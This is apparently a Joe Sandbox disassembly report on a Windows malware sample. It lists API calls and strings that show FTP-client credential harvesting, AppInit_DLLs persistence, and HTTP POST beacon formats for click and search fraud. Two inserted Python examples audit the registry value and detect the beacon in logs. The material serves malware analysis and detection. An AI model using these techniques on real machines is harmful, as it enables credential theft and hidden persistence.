                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 004037AD
                          • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 00403804
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandFolderOpenPathStrings
                          • String ID: #$&$*flashfxp*$SOFTWARE\FlashFXP\3$datafolder
                          • API String ID: 1994525040-4055253781
                          • Opcode ID: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction ID: b84aa35a929ccb2802933dbb7828156d7819aaa5c632eb2dc8c8e19af11b7673
                          • Opcode Fuzzy Hash: b5df530147ac8d267a5cbfcc016f1ae2a019a33deaf43a82b22308bd25093abb
                          • Instruction Fuzzy Hash: 203130B2900118AADB10EAA5DC85DDF7BBCEB44718F10847BF605F3180EA399B458B69
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 004099EB
                          • SysAllocString.OLEAUT32(?), ref: 004099F9
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </domain>$</url>$<domain>$<url>$http://
                          • API String ID: 2525500382-924421446
                          • Opcode ID: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction ID: c36137c4092f7a01c2c9ac5e3109157182881aca1e17db191de13133e2ad13bf
                          • Opcode Fuzzy Hash: 7723bc74f96afd5ab7d25efc8bb6f2b50cbe860e07765de9200aa53f481fba3f
                          • Instruction Fuzzy Hash: D521D876600218A6DB61AB59CC41BDB33E4FB44794F14407FE508B32C2EB785E4D4F99
                          APIs
                          • SysFreeString.OLEAUT32(75C0F6A0), ref: 00408F82
                          • SysFreeString.OLEAUT32(0000000B), ref: 00409046
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction ID: f0e6d8e47a3946ab2c5de92fa7688d846ddd73d58da4f3d2da06902102303575
                          • Opcode Fuzzy Hash: 59776c75d333dfe1639c07a446583e94a2c8bfe67c5695638f45226917350801
                          • Instruction Fuzzy Hash: A0616C70A0020AEFDB10DFA9DA845AEBBB2FB48304F2048BAD545F7251D7795E52DF08
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,00000000,00000400,00000000), ref: 0040ACAE
                          • Sleep.KERNEL32(0000EA60), ref: 0040AD76
                          • Sleep.KERNEL32(00002710), ref: 0040ADA4
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectInternet
                          • String ID: 0$^rcn=1$d$hOA$job^rev=%s^os=%s
                          • API String ID: 362191241-2593661552
                          • Opcode ID: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction ID: b79182b1151443badf469ae5f9ae195c128285790c89deda34db11c37ea10ffc
                          • Opcode Fuzzy Hash: e876ecf8844ea65909d5912cf1b13aa36029654f48e96db610e819274c2e0ff8
                          • Instruction Fuzzy Hash: 0531C471D00208ABCF20ABA6DC859AE77BAEF80309F10847BE505B72C1DA7849558B5B
                          APIs
                          • _ValidateScopeTableHandlers.LIBCMT ref: 0040D892
                          • __FindPESection.LIBCMT ref: 0040D8AC
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FindHandlersScopeSectionTableValidate
                          • String ID:
                          • API String ID: 876702719-0
                          • Opcode ID: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction ID: 4070355c3de93ac57746f54d9fb9ba92a54bad1974282013f33c457a7dad05b0
                          • Opcode Fuzzy Hash: dad01fb9bdadffb69ef4f48bfe6dd386f460ef773ad6b00c79be1d47ae49c001
                          • Instruction Fuzzy Hash: 96A1C172F042158BCB24CF98D981B6E77B1EB84314F56813AD815A73D0DB39AC49CB9D
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004088E4
                          • SysFreeString.OLEAUT32(?), ref: 004088E9
                          • SysFreeString.OLEAUT32(?), ref: 004089D3
                          • SysFreeString.OLEAUT32(?), ref: 004089D8
                          • SysFreeString.OLEAUT32(?), ref: 004089F3
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID: +@
                          • API String ID: 3341692771-3835504741
                          • Opcode ID: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction ID: a3ddab01b40b0bc50fc9c7e4bf61c95a679aea40eaf3a0ce7d8bcb6f132c7745
                          • Opcode Fuzzy Hash: 93f0afddb38b81210f93c4942281d01229e6bb84a740b12f8f50e9dc1a7fc491
                          • Instruction Fuzzy Hash: BB518171900219AFDF05BFA1CC45AEF7BB8EF08308F00447AF855B6192EB799A51CB59
                          APIs
                          • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                          • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                          • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                          • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                          • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                          • API String ID: 3100629401-2436734164
                          • Opcode ID: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                          • Opcode Fuzzy Hash: 9652d423a98df953dd9117dceebf08b302c82fbb0c377fe7acd8f7bbba186267
                          • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E
                          APIs
                          • Sleep.KERNEL32(00002710,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402566
                          • DeleteFileW.KERNEL32(00000000,00420840,00001000,00000000,?,0040B2BB,00000000,00000000,00000000,00000001,00000000,00000000), ref: 00402587
                          • Sleep.KERNEL32(0000EA60,00000000,00000001,00000000,00000000), ref: 004025B3
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • _memset.LIBCMT ref: 004025DA
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00420840,?,?,?,?,?,00000000,00000001,00000000), ref: 0040264D
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Sleep$AttemptConnectCreateDeleteFileInternetProcess_memset
                          • String ID: none
                          • API String ID: 2353737338-2140143823
                          • Opcode ID: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction ID: 23ab6f573089ca27c74aa918c09813edc931bf25471b74fd790eff350109b64e
                          • Opcode Fuzzy Hash: a9610d18699f1113e4a22a1a7ed1018a06f4e5a4b53e05e94114c749c06fc169
                          • Instruction Fuzzy Hash: 8D319231A00219ABCB21EF61DE49AEF7769FF04748F00043BF905B21C1D6789A51CBAE
                          APIs
                          • SysFreeString.OLEAUT32(?), ref: 004094E6
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: FreeString
                          • String ID:
                          • API String ID: 3341692771-0
                          • Opcode ID: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction ID: b8745a711dcf8da59f3798694fa3079dcf63c40c9cdbadd59c4d39193402e254
                          • Opcode Fuzzy Hash: 99a964074df9a43e7876bfa78059f63c2205d652b6a4e0ea0b2e4f8e9ecac31d
                          • Instruction Fuzzy Hash: C9214832A00108BBDB01DFAADC44B9E7BB8EF48345F1484B6E805F71A1D774AE41DB84
                          APIs
                          • _memset.LIBCMT ref: 0040A26B
                          • SysAllocString.OLEAUT32(?), ref: 0040A28E
                          • SysAllocString.OLEAUT32(?), ref: 0040A296
                          • SysFreeString.OLEAUT32(00000000), ref: 0040A2CA
                          • SysFreeString.OLEAUT32(?), ref: 0040A2CF
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FCE
                            • Part of subcall function 00409FB1: GetTickCount.KERNEL32 ref: 00409FDE
                            • Part of subcall function 00409FB1: Sleep.KERNEL32(00000064,?,?,0040A442,?,?), ref: 00409FEC
                            • Part of subcall function 00409FB1: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409FFB
                            • Part of subcall function 00409FB1: DispatchMessageW.USER32(?), ref: 0040A009
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: String$AllocCountFreeMessageTick$DispatchPeekSleep_memset
                          • String ID: J(@
                          • API String ID: 3143865713-2848800318
                          • Opcode ID: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction ID: bfa1c3e5fdaec5be4dfb18607c12502589e7fd5433bac8caf4aacda455aa0499
                          • Opcode Fuzzy Hash: 68495801366515c75ff4f7091ec1779cfaae467043e456767ef3efc9e03748a3
                          • Instruction Fuzzy Hash: 3A118F72D10219ABCB00DFA9DD448DEBBB9FF08354B11456AF415B7290E770AE14CFA4
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                          • CloseHandle.KERNEL32(00000000), ref: 00407880
                          • GetTickCount.KERNEL32 ref: 00407888
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CloseCountCreateHandleModuleNameTickTime
                          • String ID: UniqueNum
                          • API String ID: 1853814767-3816303966
                          • Opcode ID: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                          • Opcode Fuzzy Hash: e7107705f7d645ec0444386ddfffd8695f1bbe122d048c6309b931cdd7db22a5
                          • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB
                          APIs
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                          • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                            • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                            • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                          Strings
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$CreateModuleNamePointerRead
                          • String ID: UniqueNum$d$hOAd$x
                          • API String ID: 1528952607-1018652783
                          • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                          • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                          • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows NT\CurrentVersion\Windows,00000000,00000001,?,?,00000000), ref: 00408628
                          • GetLastError.KERNEL32(?,00000000), ref: 0040864A
                            • Part of subcall function 004069C0: RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000,7686E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                            • Part of subcall function 004069C0: RegCloseKey.KERNELBASE(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                          • DeleteFileW.KERNEL32(C:\WINDOWS\system32\gbdwpbm.dll,?,00000000), ref: 00408687
                            • Part of subcall function 004069FD: RegCreateKeyExW.ADVAPI32(0040EA48,00000000,00000000,00000000,00000000,00020006,00000000,00000002,0040EA48,?,?,?,?,00406AD3,80000001,AppEvents\Schemes\Apps\Explorer\Navigating\.current), ref: 00406A22
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CloseCreateDeleteErrorFileLastOpenQueryValue
                          • String ID: AppInit_DLLs$C:\WINDOWS\system32\gbdwpbm.dll$Software\Microsoft\Windows NT\CurrentVersion\Windows
                          • API String ID: 4026185228-3265104503
                          • Opcode ID: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction ID: 1689b80d2e7b4165945397198c320d7ed833f5e108bfbebac4dfc06446509e60
                          • Opcode Fuzzy Hash: b4fb547f36a341d56e63cd8c3141924342823e6c0e28cdd89059e7ce4998d0d2
                          • Instruction Fuzzy Hash: 99014CB2A44124B6E62067665E06F9B72AC9B00750F220D7BF905F31C0DABA9D1446AD
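The function above opens HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows, queries AppInit_DLLs and calls DeleteFileW on C:\WINDOWS\system32\gbdwpbm.dll, i.e. it manages an AppInit_DLLs entry pointing at a randomly named DLL in System32. The audit routine below is an added example, not code from the sample or from Joe Sandbox: it takes one snapshot of that key and flags the states this technique leaves behind. The registry snapshot and file list are constructed; the "random-looking name" heuristic is an assumption for the example, and LoadAppInit_DLLs / RequireSignedAppInit_DLLs are the documented gating values of the same key.

```python
r"""Audit the AppInit_DLLs value for the pattern shown above: a DLL dropped into
System32 under a random name and registered in
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows.
Added example; the snapshot below is constructed, not read from a live host.
On Windows the same dict can be filled with winreg.QueryValueEx on that key."""
import re
from typing import Dict, Iterable, List

APPINIT_KEY = r"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows"
# Assumption for the example: a bare run of lowercase letters with no
# vendor-looking prefix (gbdwpbm.dll in this report) counts as random-looking.
RANDOM_DLL = re.compile(r"^[a-z]{5,10}\.dll$")


def split_appinit(value: str) -> List[str]:
    """AppInit_DLLs is a REG_SZ list; Windows accepts comma or space separators."""
    return [p for p in re.split(r"[,\s]+", value.strip()) if p]


def audit_appinit(values: Dict[str, object], existing_files: Iterable[str]) -> List[str]:
    """Return findings for one snapshot of the Windows key.

    values         -- the key's values (AppInit_DLLs, LoadAppInit_DLLs, ...)
    existing_files -- full paths that exist on disk, any case
    """
    findings: List[str] = []
    present = {p.lower() for p in existing_files}
    entries = split_appinit(str(values.get("AppInit_DLLs", "")))
    if not entries:
        return findings
    # LoadAppInit_DLLs gates the mechanism: 0 means the list is dormant.
    if int(values.get("LoadAppInit_DLLs", 0)) != 1:
        findings.append("AppInit_DLLs is set but LoadAppInit_DLLs != 1 (dormant)")
    if int(values.get("RequireSignedAppInit_DLLs", 0)) != 1:
        findings.append("RequireSignedAppInit_DLLs != 1: unsigned DLLs are accepted")
    for entry in entries:
        name = entry.rsplit("\\", 1)[-1].lower()
        if "\\" not in entry:
            findings.append(f"{entry}: bare name, resolved through the DLL search path")
        elif entry.lower() not in present:
            # This sample calls DeleteFileW on its DLL, which leaves exactly this state.
            findings.append(f"{entry}: referenced DLL is missing on disk (dangling entry)")
        if RANDOM_DLL.match(name):
            findings.append(f"{entry}: random-looking DLL name")
    return findings


# Constructed snapshot using the path from this report.
SAMPLE_VALUES = {
    "AppInit_DLLs": r"C:\WINDOWS\system32\gbdwpbm.dll",
    "LoadAppInit_DLLs": 1,
    "RequireSignedAppInit_DLLs": 0,
}
SAMPLE_FILES = [r"C:\WINDOWS\system32\kernel32.dll"]

if __name__ == "__main__":
    for finding in audit_appinit(SAMPLE_VALUES, SAMPLE_FILES):
        print(finding)
```

A dangling entry is worth reporting on its own: the sample deletes the DLL after reading the value, so a path in AppInit_DLLs with no file behind it is the residue of this cleanup step, not a benign misconfiguration.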
                          APIs
                          • SysAllocString.OLEAUT32(?), ref: 00409B00
                          • SysAllocString.OLEAUT32(?), ref: 00409B0E
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AllocString
                          • String ID: </title>$</url>$<title>$<url>
                          • API String ID: 2525500382-2286408829
                          • Opcode ID: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction ID: e94fff7a9c4556839c155ffec7726d55edf757161a42396596b5093e86978141
                          • Opcode Fuzzy Hash: accc4c2b32817054c02e480ca82d26facf4490b578c9b74d600f9b3addd9539d
                          • Instruction Fuzzy Hash: 4F01DB7564021CA7DB116A55CC41FD637A8BB44799F044077FA04F32C3E978AA0C4BA4
                          APIs
                            • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                          • Sleep.KERNEL32(00002710,?,?,?,?,00402C8F,00000032,00000000,00000000,00000000,00000000,?), ref: 0040A91C
                          • Sleep.KERNEL32(00002710), ref: 0040AAC1
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040AAE9
                          • HeapFree.KERNEL32(00000000), ref: 0040AAF0
                          Strings
                          • jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, xrefs: 0040A957
                          • 0, xrefs: 0040AA5B
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HeapSleep$AttemptConnectFreeInternetProcess
                          • String ID: 0$jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s
                          • API String ID: 3713053250-1268808612
                          • Opcode ID: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction ID: cb73c9a78e41fc00613c6eff30345c36a412e41c8c720ed22b53be089701fd16
                          • Opcode Fuzzy Hash: 27a49e9b0a243f6ea4d036eb24575c3a25ef3ed8582b626cf885f00009b11edd
                          • Instruction Fuzzy Hash: 88515072A00218A6CF10EB95DC959DF737DEF44308F40447BF406B7281EB789A958FAA
                          APIs
                          • GetLocalTime.KERNEL32(?,?), ref: 004074AD
                          • GetLocalTime.KERNEL32(00000000), ref: 004074B3
                          • GetTimeZoneInformation.KERNEL32(?), ref: 004074EA
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 00407525
                          • SystemTimeToFileTime.KERNEL32(000007D8,?), ref: 0040752F
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040754A
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Time$FileLocalSystem$InformationUnothrow_t@std@@@Zone__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 3777474486-0
                          • Opcode ID: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction ID: c9ff0a62426275c5a0d4f0aa0fa2549fa158b312224671bef63f429b7f92df75
                          • Opcode Fuzzy Hash: dc75d57b0fd5e0fdd9494c9f665b53f3e55cd7f2b0e9017e93342081d6970c63
                          • Instruction Fuzzy Hash: 03112C72D1022DAADF00EBD4DC44AEEB7FCBF48314F04445AE901B7240E7B9A608CBA5
                          APIs
                          • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000000,00000000), ref: 004083DC
                          • GetFileSizeEx.KERNEL32(00000000,?), ref: 004083EF
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00408417
                          • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040842F
                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00408449
                          • CloseHandle.KERNEL32(?), ref: 00408452
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: File$Virtual$AllocCloseCreateFreeHandleReadSize
                          • String ID:
                          • API String ID: 1974014688-0
                          • Opcode ID: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction ID: 01d1f8b5f38b633e5055412454defe488cd8fa266e80ff04f0611ceb3180ae32
                          • Opcode Fuzzy Hash: c2b876117cf5bdd4c26ea99d0d1f22b8a7b68d93f1e59a17f5f06edaaf93f8ba
                          • Instruction Fuzzy Hash: 47115170500201FBEB305F56CE49E5BBBB9EB90700F10892DF596F21E0EB74A951DB28
                          APIs
                          • InternetConnectW.WININET(?,00000050,00000000,00000000,00000003,00000000,00000000,?), ref: 00409EA3
                          • HttpOpenRequestW.WININET(00000000,POST,04400100,00000000,00000000,00000000,04400100,00000000), ref: 00409EC3
                          • HttpSendRequestW.WININET(00000000,00000000,00000000,?,?), ref: 00409EDA
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00409F00
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: HttpInternetRequest$ConnectFileOpenReadSend
                          • String ID: POST
                          • API String ID: 961146071-1814004025
                          • Opcode ID: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction ID: 440a75f1c6cd1a7483e62584c22426b42aa3ce760e55699d8a89a0e8c7b72afb
                          • Opcode Fuzzy Hash: 20f9c5eacef7b48b8181bad7e01822bf71c4addd269446e4957b1a187c5c6ded
                          • Instruction Fuzzy Hash: B8318E71900119BFDB10DBA4DC84EFE7679EB54349F14087AFA41B62C2D6385E448BA8
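Three of the functions above make up the sample's statistics exchange: the one at 0040A91C formats jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s, the one at 00409EA3 sends it with HttpOpenRequestW/HttpSendRequestW as a POST on port 0x50 (80) and reads the reply in 0x1000-byte chunks, and the one at 00409B00 works on <url>/<title> tagged text. The block below is an added example, not the sample's or Joe Sandbox's code: a parser for the request body that can run over proxy logs, and a parser for a tagged response. The log lines and the response are constructed; that each <url> is directly followed by its <title> is an assumption the report does not state.

```python
r"""Both sides of the statistics exchange built by the functions above: the
request body formatted from
jstat^rev=%s^code=%s^site=%s^searches=%s^clicks=%s^adver=%s^os=%s and sent with
HttpSendRequestW as a POST on port 80, and a response scanned for <url>/<title>
pairs. Added example; the log lines and the response are constructed, and the
assumption that each <url> is followed by its <title> is not stated in the report."""
import re
from typing import Dict, List, Optional, Tuple

BEACON_FIELDS = ("rev", "code", "site", "searches", "clicks", "adver", "os")
TASK_RE = re.compile(r"<url>(.*?)</url>\s*<title>(.*?)</title>", re.S)


def parse_jstat(body: str) -> Optional[Dict[str, str]]:
    """Return the beacon fields, or None if body is not a complete jstat record.

    The record is the literal 'jstat' followed by key=value pairs joined by '^'.
    All seven fields must be present, in order, so a stray 'jstat' substring in
    unrelated traffic is not reported.
    """
    parts = body.strip().split("^")
    if parts[0] != "jstat":
        return None
    fields: Dict[str, str] = {}
    for pair in parts[1:]:
        key, sep, value = pair.partition("=")
        if not sep:
            return None
        fields[key] = value
    return fields if tuple(fields) == BEACON_FIELDS else None


def parse_tasks(response: str) -> List[Tuple[str, str]]:
    """Extract (url, title) pairs from a server response."""
    return TASK_RE.findall(response)


def find_beacons(lines: List[str]) -> List[Dict[str, str]]:
    """Scan 'METHOD HOST PATH BODY' log lines and return the parsed POST beacons."""
    hits: List[Dict[str, str]] = []
    for line in lines:
        cols = line.split(" ", 3)
        if len(cols) < 4 or cols[0] != "POST":
            continue
        parsed = parse_jstat(cols[3])
        if parsed is not None:
            parsed["_host"] = cols[1]
            hits.append(parsed)
    return hits


# Constructed proxy-log lines (TEST-NET addresses), one request per line.
SAMPLE_LOG = [
    "POST 203.0.113.10 /stat jstat^rev=3^code=ab12^site=example.test^searches=5^clicks=2^adver=0^os=6.1",
    "POST 203.0.113.10 /stat jstat^rev=3^code=ab12^site=example.test^searches=7^clicks=3^adver=0^os=6.1",
    "POST 198.51.100.7 /login user=alice&pass=secret",
    "GET 198.51.100.7 /index.html",
]
# Constructed response in the shape the <url>/<title> strings suggest.
SAMPLE_RESPONSE = ("<url>http://example.test/a</url><title>first</title>\n"
                   "<url>http://example.test/b</url><title>second</title>")

if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit["_host"], hit["code"], "searches", hit["searches"], "clicks", hit["clicks"])
    print(parse_tasks(SAMPLE_RESPONSE))
```

Requiring the full field set in order is what keeps the rule precise enough for a proxy or IDS feed: the caret-joined layout is distinctive, but a single key such as rev= or code= is not.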
                          APIs
                            • Part of subcall function 0040848F: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,?,00000104,00000000,?,?,?,00403796,?,?,00000104,?,00000000), ref: 004084A5
                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,?,00000008), ref: 004051EB
                          Strings
                          • SOFTWARE\smartftp\client 2.0\settings\general\favorites, xrefs: 00405157
                          • SOFTWARE\smartftp\client 2.0\settings\backup, xrefs: 00405168
                          • personal favorites, xrefs: 00405176
                          • folder, xrefs: 00405184
                          Memory Dump Source
                          • Source File: 0000000E.00000002.1849032771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_14_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: EnvironmentExpandOpenStrings
